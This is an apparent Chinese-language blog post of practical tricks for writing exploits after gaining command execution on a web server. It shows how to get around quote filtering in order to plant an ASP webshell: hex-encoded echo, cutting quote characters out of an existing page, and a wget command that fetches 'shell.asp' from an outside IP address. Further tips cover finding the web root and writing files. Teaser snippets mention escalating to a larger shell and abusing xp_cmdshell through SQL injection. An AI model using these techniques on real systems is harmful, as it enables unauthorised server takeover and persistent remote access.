写exp时遇到的问题（普遍版）

Gryffinbit

发布于：2023年10月19日

引号被过滤

今天命令执行，想要上传马，遇到了引号被过滤掉的问题。最终找到了三种方式来解决。

用echo -e 对它16进制编码
```
echo -e "\x22hello\x22" >> a.asp
```
因为它本身的asp里面有引号，我通过它仅有的命令head和cut，把它摘到了我的上传文件中
```
head -n 1 home.asp | cut -c 23 >> a.asp
```
因为有个别的案例，它有wget命令，我就用它下载匿名服务器里的asp马进去了。
```
wget http://5.188.230.77/ps/shell.asp
```

还遇到一些小问题。比如不知道web的路径在哪里，如果可以命令执行的话，就find访问的首页。

find / -name home.asp

这个返回路径，就是web的文件路径了。写入的时候，写进去这个web路径，但是GET访问的时候，直接根目录的去访问它。（因为相对路径的设置原因）也不一定是根目录，从命令执行的漏洞点进去之后，看自己的当前路径。当前路径在哪里，get就访问哪里

写入文件的时候，为了避免换行，可以用以下方式写入

echo -n "hello">a.txt

追加写入

echo -n "hello">>a.txt

windows

可以挨个换盘符，实现全局搜索的目的

 dir D:\*url.md* /s /b
 dir D:\*2023-10-25 /s /b

POC验证的时候，执行命令，用echo字符串的方式来进行验证。或者可以用md5（1）这种方式来验证。但是因为有的系统没有md5.所以推荐用echo

更新于：2023年10月25日

写PHP站的exp时遇到的问题总结

小马传大马的思想鸿宇多用户商城 user.php 任意命令执行漏洞通过命令执行的点，传入 PHP代码。写入 PHP 代码到文件中，可以先写成 txt 的文件格式，查看写入的内容是否被拦...

sql 注入xpcmdshell相关问题

sql注入select * from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’select count(*) fr...